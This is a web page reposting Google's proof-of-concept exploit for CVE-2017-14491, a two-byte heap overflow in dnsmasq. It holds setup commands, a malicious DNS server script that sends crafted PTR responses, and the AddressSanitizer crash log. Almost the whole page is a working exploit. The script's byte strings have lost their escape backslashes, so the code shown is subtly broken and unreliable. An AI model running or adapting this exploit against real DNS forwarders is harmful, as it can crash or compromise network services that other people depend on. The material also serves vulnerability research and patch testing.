Home / os / winmobile

Dnsmasq 2-Byte Heap-Based Overflow

Posted on 03 October 2017

''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14491.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html 1) Build the docker and open three terminals docker build -t dnsmasq . docker run --rm -t -i --name dnsmasq_test dnsmasq bash docker cp poc.py dnsmasq_test:/poc.py docker exec -it <container_id> bash docker exec -it <container_id> bash 2) On one terminal letas launch attacker controlled DNS server: # python poc.py 127.0.0.2 53 Listening at 127.0.0.2:53 3) On another terminal letas launch dnsmasq forwarding queries to attacker controlled DNS: # /testing/dnsmasq/src/dnsmasq -p 53535 --no-daemon --log-queries -S 127.0.0.2 --no-hosts --no-resolv dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150 dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify dnsmasq: using nameserver 127.0.0.2#53 dnsmasq: cleared cache 4) Letas fake a client making a request twice (or more) so we hit the dnsmasq cache: # dig @localhost -p 53535 -x 8.8.8.125 > /dev/null # dig @localhost -p 53535 -x 8.8.8.125 > /dev/null 5) The crash might not be triggered on the first try due to the non-deterministic order of the dnsmasq cache. Restarting dnsmasq and retrying should be sufficient to trigger a crash. ==1159==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62200001dd0b at pc 0x0000005105e7 bp 0x7fff6165b9b0 sp 0x7fff6165b9a8 WRITE of size 1 at 0x62200001dd0b thread T0 #0 0x5105e6 in add_resource_record /test/dnsmasq/src/rfc1035.c:1141:7 #1 0x5127c8 in answer_request /test/dnsmasq/src/rfc1035.c:1428:11 #2 0x534578 in receive_query /test/dnsmasq/src/forward.c:1439:11 #3 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2 #4 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7 #5 0x7fdf4b3972b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0) #6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9) 0x62200001dd0b is located 0 bytes to the right of 5131-byte region [0x62200001c900,0x62200001dd0b) allocated by thread T0 here: #0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700) #1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15 #2 0x54186c in main /test/dnsmasq/src/dnsmasq.c:99:20 #3 0x7fdf4b3972b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0) SUMMARY: AddressSanitizer: heap-buffer-overflow /test/dnsmasq/src/rfc1035.c:1141:7 in add_resource_record Shadow bytes around the buggy address: 0x0c447fffbb50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c447fffbb60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c447fffbb70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c447fffbb80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c447fffbb90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c447fffbba0: 00[03]fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c447fffbbb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c447fffbbc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c447fffbbd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c447fffbbe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c447fffbbf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==1159==ABORTING ''' #!/usr/bin/python # # Copyright 2017 Google Inc # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Authors: # Fermin J. Serna <fjserna@google.com> # Felix Wilhelm <fwilhelm@google.com> # Gabriel Campana <gbrl@google.com> # Kevin Hamacher <hamacher@google.com> # Gynvael Coldwind <gynvael@google.com> # Ron Bowes - Xoogler :/ import socket import struct import sys def dw(x): return struct.pack('>H', x) def udp_handler(sock_udp): data, addr = sock_udp.recvfrom(1024) print '[UDP] Total Data len recv ' + str(len(data)) id = struct.unpack('>H', data[0:2])[0] query = data[12:] data = dw(id) # id data += dw(0x85a0) # flags data += dw(1) # questions data += dw(0x52) # answers data += dw(0) # authoritative data += dw(0) # additional # Add the question back - we're just hardcoding it data += ('x03125x018x018x018x07in-addrx04arpax00' + 'x00x0c' + # type = 'PTR' 'x00x01') # cls = 'IN' # Add the first answer data += ('xc0x0c' + # ptr to the name 'x00x0c' + # type = 'PTR' 'x00x01' + # cls = 'IN' 'x00x00x00x3d' + # ttl 'x04x00' + # size of this resource record 'x3e' + 'Z'*62 + 'x3e' + 'Z'*62 + 'x3e' + 'Z'*62 + 'x3e' + 'Z'*62 + 'x3e' + 'Z'*62 + 'x3e' + 'Z'*62 + 'x3e' + 'Z'*62 + 'x3e' + 'Z'*62 + 'x3e' + 'Z'*62 + 'x3e' + 'Z'*62 + 'x3e' + 'Z'*62 + 'x3e' + 'Z'*62 + 'x3e' + 'Z'*62 + 'x3e' + 'Z'*62 + 'x3e' + 'Z'*62 + 'x3e' + 'Z'*62 + 'x0e' + 'Z'*14 + 'x00') # Add the next answer, which is written out in full data += ('xc0x0c' + # ptr to the name 'x00x0c' + # type = 'PTR' 'x00x01' + # cls = 'IN' 'x00x00x00x3d' + # ttl 'x00x26' + # size of this resource record 'x08DCBBEEEEx04DDDDx08CCCCCCCCx04AAAAx04BBBBx03comx00') for _ in range(79): data += ('xc0x0c' + # ptr to the name 'x00x0c' + # type = 'PTR' 'x00x01' + # cls = 'IN' 'x00x00x00x3d' + # ttl 'x00x02' + # size of the compressed resource record 'xc4x40') # pointer to the second record's name data += ('xc0x0c' + # ptr to the name 'x00x0c' + # type = 'PTR' 'x00x01' + # cls = 'IN' 'x00x00x00x3d' + # ttl 'x00x11' + # size of this resource record 'x04EEEEx09DAABBEEEExc4x49') sock_udp.sendto(data, addr) if __name__ == '__main__': if len(sys.argv) != 3: print 'Usage: %s <ip> <port> ' % sys.argv[0] sys.exit(0) ip = sys.argv[1] port = int(sys.argv[2]) sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock_udp.bind((ip, port)) print 'Listening at %s:%d ' % (ip, port) while True: udp_handler(sock_udp) sock_udp.close()

 

TOP